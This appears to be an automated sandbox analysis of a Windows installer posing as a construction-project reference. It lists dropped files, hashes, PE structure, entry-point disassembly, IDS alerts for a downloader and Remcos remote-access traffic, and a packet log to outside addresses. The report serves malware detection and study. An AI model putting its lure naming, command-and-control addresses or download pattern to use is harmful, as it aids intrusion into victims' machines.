                                                                                                                        SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                                                                                        SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                                                                                        Malicious:false
                                                                                                                        Preview:user32::EnumWindows(i r1 ,i 0)
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):52
                                                                                                                        Entropy (8bit):4.0914493934217315
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                                                                                        MD5:5D04A35D3950677049C7A0CF17E37125
                                                                                                                        SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                                                                                        SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                                                                                        SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                                                                                        Malicious:false
                                                                                                                        Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11776
                                                                                                                        Entropy (8bit):5.6559337539154555
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:eo24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol6Sl:k8QIl975eXqlWBrz7YLOl6
                                                                                                                        MD5:CA332BB753B0775D5E806E236DDCEC55
                                                                                                                        SHA1:F35EF76592F20850BAEF2EBBD3C9A2CFB5AD8D8F
                                                                                                                        SHA-256:DF5AE79FA558DC7AF244EC6E53939563B966E7DBD8867E114E928678DBD56E5D
                                                                                                                        SHA-512:2DE0956A1AD58AD7086E427E89B819089F2A7F1E4133ED2A0A736ADC0614E8588EBE2D97F1B59AB8886D662AEB40E0B4838C6A65FBFC652253E3A45664A03A00
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, Detection: malicious
                                                                                                                        • Filename: kahyts.exe, Detection: malicious
                                                                                                                        • Filename: , Detection: malicious
                                                                                                                        • Filename: Synarmogoidea.exe, Detection: malicious
                                                                                                                        • Filename: SecuriteInfo.com.Trojan.Encoder.17199.16872.exe, Detection: malicious
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2
                                                                                                                        Entropy (8bit):1.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Qn:Qn
                                                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                        Malicious:false
                                                                                                                        Preview:..
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):366017
                                                                                                                        Entropy (8bit):1.2532028651885465
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:dbvIzLHxoD5eNiie4lwAqTxNpy1eR0AByGhsjNV+k8jonGozrxNC/+BuLoi2DA9J:dI+LxNQtzwGxHzi+tbTYv4QFZfMG
                                                                                                                        MD5:8DEF494BFC232DD8D9DA302DD0F500AD
                                                                                                                        SHA1:1AD2FAA4B812AC0C6D01A262590DFC8066A9AE30
                                                                                                                        SHA-256:2A45F95B9F82E3F400E065F16025346A5278BB03D55E3F3D3BB04837A32EF69E
                                                                                                                        SHA-512:106D4C3277F0C5B374D725F042EEFBF241ACFE55899BD42EFF7D7CE56A4908FA3B5CFD75B7FFD3187D76357C85CDC7E82DC93FD9D076C8EF62704D316C2EB244
                                                                                                                        Malicious:false
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):408
                                                                                                                        Entropy (8bit):4.299736369748956
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:d10AgX3AR5XDgWIMF+3I/rb7HPkvQXkFt1gSuaAy:T0tX3iVkWIMF+3I/LP+QG1rr9
                                                                                                                        MD5:04EA5F289C84B44129BCFA191ECED45B
                                                                                                                        SHA1:E2505ED098F8B9815005EE58BDDACF40179C9D86
                                                                                                                        SHA-256:9AA6257187EB745A66D35AE1536ECDB075E22CD48D941C5AE1AFE3287CF3FCEE
                                                                                                                        SHA-512:798B8B1A5B0707CEBAD64414ABD7E238C3C4CBEF02696A6CDC98E3427406D74B47FF41B6DF1796F204FE58947156CDE8A332FC2B11884E724B54FC02C248450A
                                                                                                                        Malicious:false
                                                                                                                        Preview:blockhole hermafrodittens brawlingly seropus milieuomraadets annebeths..prolixity maskinstuers kattemaden fejltrinenes horoscoper everhart.tuskes superaspiration instinkterne gluneamie.applikationsprogrammrens forhekselserne hes bisamrottes gretel balaenoid datebook uniflowered..afrohaarets cholralosed forflg,didaktiker pseudophallic frskolealder squattiness ulotrichaceous consumation opgavesttets repos..
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):231219
                                                                                                                        Entropy (8bit):1.2469505743129965
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:kG1XbScC6kNorGiP8+Fq6BiOiqrcS3M6X7QQz82rc//gKj0OVdY0vLTRX34nSaIc:kPNj+/Vy6XTKjTZn5Wb/8
                                                                                                                        MD5:B8DCFF52B32142B46BCF9E07C97FE39B
                                                                                                                        SHA1:1DC3097327E42B862D9DAAA41F6B4DB8417D44B4
                                                                                                                        SHA-256:1C74E5F1420689E862000BE741AE2B1E0E85861269454B028C231CCB7AB20260
                                                                                                                        SHA-512:B6EB26FE2DA081E8CDFA0C0B9E7CF63F40EA561A6A743BD67D0B1564CEB354C7D7B26D28AB3060E381D0B8CD08B9E9E9F7FD03C63FE4750F02796E8B45F304FC
                                                                                                                        Malicious:false
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):439309
                                                                                                                        Entropy (8bit):1.2535989842374102
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:BDBApFss1TiZa+ZJGxLn2CGfgUdqiY4H258QjjjIAfXMsSFa3C59X66JAqtkEBRU:cB7A32jjaikB4eNkPO+jvCMUB9
                                                                                                                        MD5:A52FC0A739A55A6C379086CF33B63E8A
                                                                                                                        SHA1:00F9D7338B1858C9625C2524CB30E9C01BCD70E1
                                                                                                                        SHA-256:3D94DFA61B0EA65EB5D101A193BE132433B5C875342CBAF3107EB4F671C7155B
                                                                                                                        SHA-512:2C816D9B05C5C9EADC5EC32A256619257D876296385D25DD3A2B7923D397045FD937BC9BEE9AB20C31F3E78E46FDEB45D8256635F9BA6E1D2619E2C03BFF12D3
                                                                                                                        Malicious:false
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):99603
                                                                                                                        Entropy (8bit):4.620497911390432
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:iQD89oZ+GxnYHCVVznKg2vxZ2eVQ7gIJHe:54wnYo9nK1vxZZV5IJ+
                                                                                                                        MD5:BC9AFDEACA064DC5DA84ACF2D04E3577
                                                                                                                        SHA1:72B7BE79142A29CEDA1AFAC6CEE25EB3ACF0A9D6
                                                                                                                        SHA-256:5C673857E74A09846011C7A8EB895C4FA59725B6DD34A3E056721437166AF38D
                                                                                                                        SHA-512:E3004DE5EFD0D130CDD5C9010940B27EFD86B11D8F222317FDEA61BD4829DEBC36D57D13519E3C5D4241F143E9D24AF5C74FE7409DE0CD9D4723F4228DCE7CDE
                                                                                                                        Malicious:false
                                                                                                                        Process:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):462985
                                                                                                                        Entropy (8bit):7.101092680320197
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:fbAGyIcif/hxF1hPHxx8NAS7Ymf8Jtl1rv6bXFiSbaMHzjtVxh:fbARIcif/hP1hvP8SS7YxtlpibBzBVD
                                                                                                                        MD5:B5C6C69CE7BDE93BA974FAF5D299AC46
                                                                                                                        SHA1:4D9E4FB8FA8FEDD34E324D4F0EA9D3C743A08022
                                                                                                                        SHA-256:FC80479873AF715F0B89884550B439BB801C9A4051CD07BB910F6B87ADC84BC6
                                                                                                                        SHA-512:361F6E8141BEF067D6D944ADB84B5889696E5229C03E074BE6F71642A6BE28E2C34B7A84D8EC4CA4965E7162B334934559D7AF84A0FB1CB07DACF378A227C36A
                                                                                                                        Malicious:false
                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.731554844311202
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5:92e917f439cc408828a0629d80fdb043
                                                                                                                        SHA1:ffcf08807371521fb40a31aff774e3275cd4338d
                                                                                                                        SHA256:6959fb446ee0634e6622e50f0f1b9367bffddf12f8083507cdc0ff39ed50abf4
                                                                                                                        SHA512:c78fa619b27defc8a458a841b7fa20fe84e738e2d13203d0c8f454adb83555da99c574105bc36d4aeb765ee0cb67d158a1828fb2f88a92d1f6dcc51c7dfd5f9a
                                                                                                                        SSDEEP:12288:GtomEHbPcEFdCSdWdQqOFvvcW/5W4MiTFroRnk9YZaax8NNAta67Qi5vz8s+u+K+:TN7PcKd66MWjBroRbkOQ/t
                                                                                                                        TLSH:2D05F113FB63C0E7DB7EA3F2F683E5BB1DFDA4567C90848D56A2A6D26000E32051E525
                                                                                                                        Icon Hash:c9b9b9ad9b83e979
                                                                                                                        Entrypoint:0x40335a
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x55C15CE6 [Wed Aug 5 00:46:30 2015 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                                                        Instruction
                                                                                                                        sub esp, 000002D8h
                                                                                                                        push ebx
                                                                                                                        push ebp
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        push 00000020h
                                                                                                                        xor ebp, ebp
                                                                                                                        pop esi
                                                                                                                        mov dword ptr [esp+18h], ebp
                                                                                                                        mov dword ptr [esp+10h], 00409230h
                                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                                        call dword ptr [00407034h]
                                                                                                                        push 00008001h
                                                                                                                        call dword ptr [004070BCh]
                                                                                                                        push ebp
                                                                                                                        call dword ptr [004072ACh]
                                                                                                                        push 00000009h
                                                                                                                        mov dword ptr [004292B8h], eax
                                                                                                                        call 00007FF1CD4D189Eh
                                                                                                                        mov dword ptr [00429204h], eax
                                                                                                                        push ebp
                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                        push 000002B4h
                                                                                                                        push eax
                                                                                                                        push ebp
                                                                                                                        push 004206A8h
                                                                                                                        call dword ptr [0040717Ch]
                                                                                                                        push 0040937Ch
                                                                                                                        push 00428200h
                                                                                                                        call 00007FF1CD4D1509h
                                                                                                                        call dword ptr [00407134h]
                                                                                                                        mov ebx, 00434000h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        call 00007FF1CD4D14F7h
                                                                                                                        push ebp
                                                                                                                        call dword ptr [0040710Ch]
                                                                                                                        push 00000022h
                                                                                                                        mov dword ptr [00429200h], eax
                                                                                                                        pop edi
                                                                                                                        mov eax, ebx
                                                                                                                        cmp word ptr [00434000h], di
                                                                                                                        jne 00007FF1CD4CE949h
                                                                                                                        mov esi, edi
                                                                                                                        mov eax, 00434002h
                                                                                                                        push esi
                                                                                                                        push eax
                                                                                                                        call 00007FF1CD4D0F47h
                                                                                                                        push eax
                                                                                                                        call dword ptr [00407240h]
                                                                                                                        mov ecx, eax
                                                                                                                        mov dword ptr [esp+1Ch], ecx
                                                                                                                        jmp 00007FF1CD4CEA3Bh
                                                                                                                        push 00000020h
                                                                                                                        pop edx
                                                                                                                        cmp ax, dx
                                                                                                                        jne 00007FF1CD4CE949h
                                                                                                                        inc ecx
                                                                                                                        inc ecx
                                                                                                                        cmp word ptr [ecx], dx
                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4a000 | 0x329e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5f0a | 0x6000 | 5e32878b5f332958538d1180572efaac | False | 0.6613362630208334 | data | 6.449510420642677 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x202f8 | 0x600 | bdee9c3c56769fb763ba9ed65b414b2c | False | 0.484375 | data | 3.832327307800933 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4a000 | 0x329e8 | 0x32a00 | 2a1a63438510fc393e60de344f7865bb | False | 0.40760030864197533 | data | 6.330044290302057 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4a388 | 0x10a00 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.23011630639097744
RT_ICON | 0x5ad88 | 0x9a00 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9756239853896104
RT_ICON | 0x64788 | 0x9600 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.26375
RT_ICON | 0x6dd88 | 0x5600 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736 | English | United States | 0.2945130813953488
RT_ICON | 0x73388 | 0x4400 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.31301700367647056
RT_ICON | 0x77788 | 0x2600 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.3628700657894737
RT_ICON | 0x79d88 | 0x1200 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.4375
RT_ICON | 0x7af88 | 0xa00 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.529296875
RT_ICON | 0x7b988 | 0x600 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.47265625
RT_DIALOG | 0x7bf88 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0x7c0d0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x7c1d0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x7c2f0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x7c350 | 0x84 | data | English | United States | 0.7045454545454546
RT_VERSION | 0x7c3d8 | 0x2d0 | data | English | United States | 0.49027777777777776
RT_MANIFEST | 0x7c6a8 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447
DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T16:18:45.335302+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49736 | 66.63.187.30 | 80 | TCP
2024-12-16T16:18:50.616214+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49737 | 162.251.122.87 | 2404 | TCP
2024-12-16T16:18:52.803573+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49738 | 162.251.122.87 | 2404 | TCP
2024-12-16T16:18:53.084850+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 49739 | 178.237.33.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                        Dec 16, 2024 16:18:45.455174923 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.455205917 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.526942968 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.527056932 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.527167082 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.531302929 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.531377077 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.531472921 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.531567097 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.537765026 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.537847996 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.537858963 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.537982941 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.545989037 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.546180964 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.546194077 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.546258926 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.554490089 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.554574966 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.554641008 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.554641008 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.562863111 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.563025951 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.563035011 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.563113928 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.571279049 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.571382046 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.571427107 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.571533918 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.579660892 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.579745054 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.579758883 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.579894066 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.588095903 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.588201046 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.588407993 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.596456051 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.596561909 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.596582890 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.596632004 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.604954958 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.605071068 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.605124950 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.605196953 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.718976021 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.718997955 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.719295025 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.721375942 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.721472979 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.721589088 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.721589088 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.725244999 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.725363016 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.725399971 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.725752115 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.730209112 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.730267048 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.730449915 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.735095024 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.735194921 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.735224009 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.735291004 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.740181923 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.740206003 CET804973666.63.187.30192.168.2.4
